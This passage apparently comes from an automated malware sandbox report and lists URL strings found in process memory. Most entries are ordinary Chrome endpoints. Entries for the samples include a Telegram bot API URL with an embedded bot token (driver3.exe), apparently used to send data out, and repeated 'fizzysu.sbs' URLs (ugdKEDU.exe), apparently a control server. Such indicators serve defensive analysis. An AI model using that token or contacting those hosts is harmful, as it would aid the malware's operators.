Source: chrome.exe, 0000002E.00000002.3236609081.00002AD800CE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382j
Source: chrome.exe, 0000002E.00000003.3132599681.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3132646553.00002AD800D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3236609081.00002AD800CE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 0000002E.00000002.3236609081.00002AD800CE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 0000002E.00000003.3132599681.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3132646553.00002AD800D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3236609081.00002AD800CE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 0000002E.00000003.3132599681.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3132646553.00002AD800D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3236609081.00002AD800CE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 0000002E.00000003.3132599681.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3132646553.00002AD800D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3236609081.00002AD800CE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: driver3.exe, 00000020.00000002.3346748725.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp, driver3.exe, 00000020.00000000.2961620464.00007FF7C00B5000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage
Source: driver3.exe, 00000020.00000002.3222957219.0000020E7B418000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7796466207:AAFr4eJop5lV1qGyhuFlMc4hIV2ErcSZ_4E
Source: driver3.exe, 00000020.00000002.3222957219.0000020E7B418000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7796466207:AAFr4eJop5lV1qGyhuFlMc4hIV2ErcSZ_4E/sendMessage
Source: chrome.exe, 0000002E.00000003.3159463865.00002AD8002B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3159601893.00002AD801378000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: chrome.exe, 0000002E.00000002.3233046357.00002AD800794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3239699523.00002AD801108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 0000002E.00000002.3236503899.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3133512710.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160795120.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3144041851.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3138932472.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: ugdKEDU.exe, 00000022.00000002.3565393312.0000000003945000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 0000002E.00000002.3236559772.00002AD800CC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 0000002E.00000002.3236559772.00002AD800CC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: ugdKEDU.exe, 00000022.00000002.3565393312.0000000003945000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 0000002E.00000002.3236394953.00002AD800C6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 0000002E.00000002.3236394953.00002AD800C6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 0000002E.00000002.3236394953.00002AD800C6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: ugdKEDU.exe, 00000022.00000002.3565393312.0000000003945000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229329833.00002AD8003AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 0000002E.00000003.3136534048.00002AD800D64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000002E.00000002.3230437339.00002AD8005A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 0000002E.00000002.3230954322.00002AD800618000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3240366901.00002AD801238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3230437339.00002AD8005A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3235016954.00002AD8009F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 0000002E.00000002.3240366901.00002AD801238000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en8
Source: chrome.exe, 0000002E.00000002.3230954322.00002AD800618000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enk
Source: chrome.exe, 0000002E.00000002.3236798798.00002AD800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3132507634.00002AD800D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3132415607.00002AD800D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139037821.00002AD80042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3133637436.00002AD800D38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3132309352.00002AD80042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3139082965.00002AD800D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3136534048.00002AD800D64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 0000002E.00000002.3227797865.00002AD80001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstorekgejglhpjiefppelpmljglcjbhoiplfn
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3100712180.0000468800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 0000002E.00000002.3228680189.00002AD80020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 0000002E.00000002.3227797865.00002AD80001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g
Source: chrome.exe, 0000002E.00000003.3083140803.000078A8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3083194608.000078A8002E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 0000002E.00000003.3128824327.00002AD8006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3230560741.00002AD8005D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3227797865.00002AD80001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3230391636.00002AD800584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3231556898.00002AD800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 0000002E.00000002.3234759298.00002AD8009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 0000002E.00000002.3234759298.00002AD8009A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 0000002E.00000002.3233046357.00002AD800794000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 0000002E.00000002.3230954322.00002AD800618000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: powershell.exe, 00000001.00000002.2194388552.00000000062FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2194388552.00000000062FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2194388552.00000000062FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: chrome.exe, 0000002E.00000002.3235513703.00002AD800AB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: LCESjzR.tmp, 0000001E.00000002.3071709090.00000000008EC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: LCESjzR.tmp, 0000001E.00000002.3071709090.00000000008EC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0
Source: LCESjzR.tmp, 0000001E.00000002.3071709090.00000000008EC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0.
Source: chrome.exe, 0000002E.00000002.3229095455.00002AD800324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 0000002E.00000002.3228918464.00002AD8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232729061.00002AD800729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232729061.00002AD800729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002E.00000002.3229714741.00002AD800484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232729061.00002AD800729000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3238716176.00002AD800F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3232932825.00002AD80074C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 0000002E.00000002.3228918464.00002AD8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002E.00000002.3233046357.00002AD800794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3239699523.00002AD801108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 0000002E.00000002.3228918464.00002AD8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002E.00000002.3233046357.00002AD800794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3239699523.00002AD801108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3229669379.00002AD800458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 0000002E.00000002.3229095455.00002AD800324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.c
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 0000002E.00000002.3229095455.00002AD800324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 0000002E.00000002.3229095455.00002AD800324000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.googlP2
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 0000002E.00000003.3139722722.00002AD8012A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 0000002E.00000003.3118235107.00002AD80044C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 0000002E.00000002.3229296923.00002AD80039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3234557517.00002AD800968000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002E.00000002.3236559772.00002AD800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3230437339.00002AD8005A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 0000002E.00000002.3230437339.00002AD8005A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: ugdKEDU.exe, 00000022.00000002.3565393312.0000000003945000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3236503899.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3133512710.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3160795120.00002AD800CAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3144041851.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3138932472.00002AD800CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ugdKEDU.exe, 00000022.00000002.3565393312.0000000003945000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3236559772.00002AD800CC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 0000002E.00000002.3236559772.00002AD800CC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: ugdKEDU.exe, 00000022.00000002.3565393312.0000000003945000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs/
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs/-end-point:
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs//Bo
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs/3
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000BD9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs/4
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs/6
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs/;BS
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs/WB
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs;
Source: ugdKEDU.exe, 00000022.00000002.3517161138.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fizzysu.sbs_B?
Source: powershell.exe, 00000001.00000002.2182467188.00000000053E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2182467188.0000000005A76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: chrome.exe, 0000002E.00000003.3100712180.0000468800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 0000002E.00000003.3100712180.0000468800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/gj
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3100712180.0000468800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 0000002E.00000003.3100712180.0000468800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 0000002E.00000003.3100712180.0000468800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/F
Source: chrome.exe, 0000002E.00000003.3100712180.0000468800684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 0000002E.00000002.3271495996.000046880078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 0000002E.00000003.3097904195.0000468800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000003.3098282511.000046880039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3308805539.000046880080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3227763457.00002AD80000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 0000002E.00000002.3228574507.00002AD8001D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 0000002E.00000002.3230437339.00002AD8005A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3237387069.00002AD800DE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002E.00000002.3237387069.00002AD800DE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 0000002E.00000003.3131936413.00002AD800388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
